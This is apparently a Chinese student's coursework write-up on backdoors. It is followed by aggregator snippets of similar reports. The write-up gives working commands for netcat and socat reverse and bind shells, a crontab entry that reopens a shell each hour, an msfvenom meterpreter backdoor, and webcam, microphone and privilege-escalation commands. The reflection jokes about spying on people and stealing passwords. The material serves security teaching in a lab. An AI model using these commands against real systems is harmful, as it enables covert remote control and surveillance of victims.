20155305《网络对抗》后门原理与实践(代码片段)

qiaolei qiaolei     2022-10-28     281

关键词:

20155305《网络对抗》后门原理与实践

实验过程(基本后门工具实践)

1、Win获取Linux shell

(1)Win在cmd.exe中使用ipconfig命令查看主机的IP。

(2)Win下载老师的下载地址比较方便、解压ncat压缩包,在cmd中进入ncat文件夹中,使用ncat.exe -l -p 5305命令运行ncat.exe监听5305端口。

(3)Linux在终端窗口使用nc Win的IP 端口号 -e /bin/sh命令去连接Win的5305端口。

连接成功后就可以在Win的cmd窗口中输入Linux的命令,此时已经获取了Linux的shell。

2、Linux获取Win shell

(1)Linux在终端中使用ifconfig命令查看自己的IP。

(2)Linux使用nc -l -p 5305命令监听5305端口。

(3)Win在cmd窗口使用ncat.exe -e cmd.exe linux的IP 端口命令去连接Linux的5305端口。

(4)连接成功后就可以在Linux的终端窗口中输入Win的命令,此时已经获取了Win的shell。

3、使用nc传输数据

(1)Win使用ncat.exe -l 5305命令监听5305端口。
(2)Linux在终端窗口使用nc Win的IP 端口号命令去连接Win的5305端口。

(3)双向传输数据。

4、nc定时启动

(1)Win使用ncat.exe -l -p 5305命令运行ncat.exe监听5305端口。

(2)Linux使用crontab -e命令,在最后一行添加分钟数 * * * * /bin/netcat Win的IP 端口 -e /bin/sh,在每个小时的这个分钟反向连接Windows主机的端口。

(3)15分时Win获得了Linux的shell,可以显示想要获取的东西

5、实践SoCat的功能

(1)在Win下,依次打开控制面板,管理工具,任务计划程序,然后选择创建一个新任务,填写好任务名称(eg20155305);新建一个触发器,并设置触发器的相关参数;新建操作,设置如图相关参数tcp-listen:端口号 exec:cmd.exe,pty,stderr

此时需下载socat.exe老师的下载地址比较方便

(2)刷新查看到新建的任务已经开始运行了若未运行可以右键点击所创建任务并开始运行

(3)Linux下使用socat - tcp:Win的IP:端口命令,此时已经获取了Win的shell,可以查看想知道的东西。

6、实践MSF Meterpreter功能

(1)Linux下使用msfvenom -p windows/meterpreter/reverse_tcp LHOST=Linux的IP LPORT=端口 -f exe > 20155305_backdoor.exe(20155305_backdoor.exe是会生成的后门文件的名字)命令生成后门。

(2)将后门传送到Win主机上(我传送到了ncat文件夹下)。遇到杀毒软件要精确将你自己的后门恢复添加信任区(适合用于腾讯电脑管家)

(3)Linux使用msfconsole命令进入控制台,并进行一系列payload、IP、端口的设置。

(4)在msf的命令下输入命令use exploit/multi/handler,payload设置命令set payload windows/meterpreter/reverse_tcp,继续设置IP(此处设置虚拟机的Linux的IP地址)和端口

(5)Linux使用exploit命令开始监听,此时在Win上执行后门程序。

(6)Linux已经和Win连接好了,可以开始尝试不同的功能了。

  • 录音功能:record_mic

  • 拍照功能:webcam_snap

  • 拍摄视频功能:webcam_stream

  • 记录击键功能:screenshot

  • 提权:getuid以及getsystem

实验总结与体会

本次实验让我对这门课程惊为天人哈哈,完全实现小时候所以为的黑客们会做的事情:监控偷看他人,翻看他人电脑里的资料、盗取别人的密码、控制别人的电脑等很酷炫很爽很惊悚。感觉自己学会了一项看似很了不起的技能,感觉拿出去可以和无知的高中小伙伴吹个牛了哈哈,享受一下别人崇拜。所以现在没学免杀,以后学了免杀岂不是更厉害,电脑可以发现我的后门是个病毒我也是很开心哈哈,也就是说我的电脑管家也是有用的嘛哈哈,免杀了就不晓得了。这次收获很大,感谢老师感谢这门课程。

20154307《网络对抗技术》实验二后门原理与实践(代码片段)

20154307《网络对抗技术》实验二后门原理与实践一、基础问题回答(1)例举你能想到的一个后门进入到你系统中的可能方式?答:下载盗版软件或者盗版电影的时候。(2)例举你知道的后门如何启动起来(win及linux)的方式?答:linux的c... 查看详情

20155227《网络对抗》exp2后门原理与实践(代码片段)

20155227《网络对抗》Exp2后门原理与实践基础问题回答(1)例举你能想到的一个后门进入到你系统中的可能方式?在非官方网站下载软件时,后门很可能被捆绑在软件中。攻击者利用欺骗的手段,通过发送电子邮件或者文件,并诱使... 查看详情

2017-2018-220155231《网络对抗技术》实验二:后门原理与实践(代码片段)

2017-2018-220155231《网络对抗技术》实验二:后门原理与实践常用后门工具一、Windows获得Linux的Shell在本机cmd中使用ipconfig获得windows的IP地址1.windows打开监听2.Linux反弹连接winnc(主机ip)5231(所设置的端口)-e/bin/sh3.windows下获得一个linuxshel... 查看详情

20155202张旭《网络对抗》exp2后门原理与实践(代码片段)

20155202张旭《网络对抗》Exp2后门原理与实践基础问题回答例举你能想到的一个后门进入到你系统中的可能方式?捆绑在软件中注入在可执行文件里注入在office文件的宏里面例举你知道的后门如何启动起来(win及linux)的方式?更改... 查看详情

2017-2018-2《网络对抗技术》20155322第五周exp2后门原理与实践(代码片段)

#2017-2018-2《网络对抗技术》20155322第五周Exp2后门原理与实践[博客目录]1-实践目标1.1-实践介绍1.2-实践内容1.3-实践要求2-实践过程2.1-使用nc实现win,mac,Linux间的后门连接2.2-meterpreter的应用2.3-MSFPOST模块的应用2.4-注入Shellcode并执行3-... 查看详情

20154306刘宇轩网络对抗exp2后门原理与实践(代码片段)

一、实践目标与内容1.学习内容使用nc实现win,mac,Linux间的后门连接meterpreter的应用MSFPOST模块的应用2.学习目标学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能。通过亲手实践并了解这一事实,提高自己的... 查看详情

20154324刘康权《网络对抗》exp2后门原理与实践(代码片段)

一、实践目标与内容1.学习内容使用nc实现win,mac,Linux间的后门连接meterpreter的应用MSFPOST模块的应用2.学习目标学习建立一个后门连接,并了解其中的知识点,同时熟悉后门连接的功能。通过亲手实践并了解这一事实,提高自己的... 查看详情

20155204王昊《网络对抗技术》exp2后门原理与实践(代码片段)

20155204王昊《网络对抗技术》EXP2后门原理与实践一、实验内容准备工作(试用ncat、socat)1.使用netcat获取主机操作Shell,cron启动。明确目标:要利用crontab命令从Windows获得linux的shell。在Windows下监听自定端口。用man命令查询crontab... 查看详情

2019-2020-2网络对抗技术20174326旦增列错exp2后门原理与实践(代码片段)

 2019-2020-2网络对抗技术20174326旦增列错Exp2后门原理与实践目录一、实验介绍二、实验准备三、实验过程任务一:使用netcat实现windows,linux之间的后门连接任务二:使用socat获取主机操作Shell,任务计划启动任务三:MFSmeterpreter生... 查看详情

20154329《网络对抗技术》后门原理与实践

#Exp2后门原理与实践 ##实验准备 1.知识储备 关于netcat:    又名nc,ncat.是一个底层工具,进行基本的TCPUDP数据收发。常被与其他工具结合使用,起到后门的作用。2.f附件准备 在课程主页下载附件ncat.exe... 查看详情

20145311王亦徐《网络对抗技术》后门原理与实践

20145311王亦徐《网络对抗技术》后门原理与实践实验内容使用netcat、socat获取主机操作Shell,并分别设置cron启动与任务计划启动使用MSFmeterpreter生成后门的可执行文件,并利用ncat或socat传送给主机,接着运行文件获取目标主机的音... 查看详情

20155338《网络对抗》exp2后门原理与实践

20155338《网络对抗》Exp2后门原理与实践一、基础问题(1)例举你能想到的一个后门进入到你系统中的可能方式?答:游览网站中附带的广告或弹出的不正规软件。(2)例举你知道的后门如何启动起来(win及linux)的方式?答:1.... 查看详情

2019-2020-220175303柴轩达《网络对抗技术》exp2后门原理与实践(代码片段)

目录2019-2020-220175303柴轩达《网络对抗技术》Exp2后门原理与实践1.基础知识总结2.实验内容任务一任务二任务三任务四任务五3.问题与解决4.基础问题回答5.实验总结与体会2019-2020-220175303柴轩达《网络对抗技术》Exp2后门原理与实践1... 查看详情

20145317彭垚《网络对抗》exp2后门原理与实践

20145317彭垚《网络对抗》Exp2后门原理与实践基础问题回答例举你能想到的一个后门进入到你系统中的可能方式?在网上下载软件的时候,后门很有可能被捆绑在下载的软件当中;例举你知道的后门如何启动起来(win及linux)的方式... 查看详情

网络对抗技术2017-2018-220152515exp2后门原理与实践(代码片段)

1.实验内容(1)使用netcat获取主机操作Shell,cron启动(0.5分)(2)使用socat获取主机操作Shell,任务计划启动(0.5分)(3)使用MSFmeterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)(4)使用MSFmeterpreter(... 查看详情

20145331魏澍琛《网络对抗》exp2后门原理与实践

20145331魏澍琛《网络对抗》Exp2后门原理与实践基础问题回答(1)例举你能想到的一个后门进入到你系统中的可能方式?上网时候弹出一个广告说你中奖了,或者你可以贷款10万元之类的,你一激动一点进去后门就进入你的系统了。(... 查看详情

20155218《网络对抗》exp3免杀原理与实践(代码片段)

20155218《网络对抗》Exp3免杀原理与实践一、使用msf生成后门程序的检测(1)将上周msf生成的后门文件放在virscan.org中进行扫描,截图如下:(2)使用msf时对它多编码1次并进行测试发现能发现的杀软变少;(3)使用msf时对它多编... 查看详情

20165223《网络对抗技术》exp2后门原理与实践(代码片段)

目录——后门原理与实践后门原理与实践说明实验任务基础知识问答常用后门工具实验内容任务一:使用netcat获取主机操作Shell,cron启动任务二:使用socat获取主机操作Shell,任务计划启动任务三:使用MSFmeterpreter生成可执行文件... 查看详情